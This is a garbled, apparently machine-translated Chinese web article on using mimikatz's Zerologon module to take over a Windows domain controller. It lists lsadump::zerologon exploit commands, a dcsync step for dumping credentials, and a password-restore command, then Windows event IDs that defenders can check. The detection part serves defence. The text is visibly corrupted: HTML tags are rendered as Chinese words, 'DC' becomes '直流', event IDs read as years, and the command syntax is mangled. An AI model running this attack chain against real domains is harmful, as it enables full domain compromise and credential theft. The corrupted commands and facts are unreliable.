介绍
本篇内容主要讲解“mimikatz怎么利用zerologon攻击域控服务器”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“mimikatz怎么利用zerologon攻击域控服务器”吧!
<节>,0 x01前言
mimikatz 20200918版本支持通过zerologon漏洞攻击域控服务器。下载链接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0 - 20200918修复
官方利用截图如下
,mimikatz相关命令
- <李> <节> <代码> lsadump:: zerologon/目标:dc.hacke。testlab/账户:直流poc $ 代码> 节> 李> <李> <节> <代码> lsadump:: zerologon/目标:dc.hacke。testlab/账户:直流/美元利用通过zerologon> 代码漏洞攻击域控服务器节> 李> <李> <节> <代码> lsadump:: dcsync 代码> 节> 李> <李> <节> <代码> lsadump:: postzerologon/目标:conttosson。locl/账户:直流$ # 代码>恢复密码节> 李>
pcap包
利用zerologon漏洞攻击域控的数据包,方便同学们写完规则做测试pcap github下载地址
,窗户事件管理器自查
在未打补丁的域控,重点查看窗户事件管理器中,eventid为4742年或4624年者,5805年
在windows 8月更新中,新增事件ID 5829, 5827, 5828, 5830, 5831。蓝队可以重点关注这几个事件ID以方便自查
- <李> <节>当在初始部署阶段允许存在漏洞的Netlogon安全通道连接时,将生成事件ID 5829。节> 李> <李> <>节管理员可以监控事件ID 5827年和5828年,这些事件ID在存在漏洞的Netlogon连接被拒绝时触发节> 李> <李> <节> 5830、5831,如果”域控制器:允许易受攻击的Netlogon安全通道连接”组策略允许连接。节> 李>
mimikatz通过zerologon攻击成功后,将会留下事件ID为4648 .
, 节>到此,相信大家对“mimikatz怎么利用zerologon攻击域控服务器”有了更深的了解,不妨来实际操作一番吧!这里是网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!